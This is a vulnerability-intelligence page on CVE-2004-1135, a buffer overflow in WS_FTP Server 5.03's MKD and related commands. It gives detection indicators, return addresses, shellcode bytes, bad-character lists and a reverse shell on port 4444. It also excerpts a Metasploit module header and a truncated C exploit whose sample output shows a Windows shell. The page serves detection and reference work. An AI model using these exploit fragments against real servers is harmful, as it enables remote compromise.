CVE-2004-1135
published 2005-01-10CVE-2004-1135: Multiple buffer overflows in WS_FTP Server 5.03 2004.10.14 allow remote attackers to cause a denial of service (service crash) via long (1) SITE, (2) XMKD, (3)…
PriorityP431medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
49.64%
98.7th percentile
Multiple buffer overflows in WS_FTP Server 5.03 2004.10.14 allow remote attackers to cause a denial of service (service crash) via long (1) SITE, (2) XMKD, (3) MKD, and (4) RNFR commands.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipswitch | ws_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x53\x9B\x2E\x7C
bytes↗
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe
- →Detect oversized MKD FTP command (>2000 bytes) sent to port 21, indicative of buffer overflow exploitation against WS_FTP Server 5.03. ↗
- →Detect oversized SITE, XMKD, and RNFR FTP commands (>2000 bytes) on port 21 as additional attack vectors for the same vulnerability. ↗
- →Check FTP banner for version string '5.0.3' to identify vulnerable WS_FTP Server instances; the Metasploit module flags this as Vulnerable. ↗
- →The exploit uses libeay32.dll ROP gadget (push esp; ret) at 0x25185bb8 — presence of this return address in network traffic or memory is a strong exploit indicator. ↗
- →Payload bad characters for this exploit are: \x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e — shellcode in MKD payloads will avoid these bytes. ↗
- →The exploit opens a reverse shell on port 4444; monitor for unexpected outbound connections to port 4444 from FTP server processes. ↗
- →The alignment marker 'DEEF' (0x44454546) in the MKD argument is used to locate EIP offset; presence of this pattern in FTP MKD commands indicates exploit alignment probing. ↗
- ·The Metasploit module targets WS-FTP Server 5.03 Universal using a single return address from libeay32.dll; the exploit requires a valid authenticated FTP session (Privileged => false) before sending the malicious MKD command. ↗
- ·The win2k SP4 RET address (\x53\x9B\x2E\x7C) in the C exploit is platform-specific; the Metasploit module uses a different universal address (0x25185bb8 from libeay32.dll) intended to work on both XP and 2K. ↗
- ·Metasploit payload space is limited to 480 bytes with a stack adjustment of -3500; payloads exceeding this space or containing bad characters will fail. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)
exploitdb·2010-10-05
CVE-2004-1135 Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)
Ipswitch WS_FTP Server 5.03 - MKD Overflow (Metasploit)
---
##
# $Id: wsftp_server_503_mkd.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'WS-FTP Server 5.03 MKD Overflow',
'Description' => %q{
This module exploits the buffer overflow found in the MKD
command in IPSWITCH WS_FTP Server 5.03 discovered by Reed
Arvin.
},
'Author' => [ 'et', 'Reed Arvin ' ],
'License' => BSD_LICENSE,
'Version' => '$Revision: 10559 $',
'Platform' => [ 'win' ],
'References' =>
[
[ 'CVE', '2004-1135' ],
[ 'OSVDB', '12509' ],
[
Exploit-DB
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
exploitdb·2004-11-29
CVE-2004-1135 Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
Ipswitch WS_FTP Server 5.03 - MKD Remote Buffer Overflow
---
/*
no@0x00:~/Exploits/IPS-WSFTP$ ./IPSWSFTP-exploit 10.20.30.2 test test
***Ipswitch WS_FTP Remote buffer overflow exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 21.
[x] Sending Login..done.
[x] Sending bad code..done.
[x] Checking if exploitation was successful..
[x] Connected to: 10.20.30.2 on port 4444.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Greetz to Reed Arvin, NtWaK0,kane,schap, and kamalo :)
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 21
#define RPORT 4444
#define RET "\x53\x9B\x2E\x7C" /*win2k sp4*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe"
"
Metasploit
WS-FTP Server 5.03 MKD Overflow
metasploit
WS-FTP Server 5.03 MKD Overflow
WS-FTP Server 5.03 MKD Overflow
This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029600.htmlhttp://marc.info/?l=bugtraq&m=110177654524819&w=2http://www.securiteam.com/exploits/6D00L2KBPG.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/18296http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029600.htmlhttp://marc.info/?l=bugtraq&m=110177654524819&w=2http://www.securiteam.com/exploits/6D00L2KBPG.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/18296
2005-01-10
Published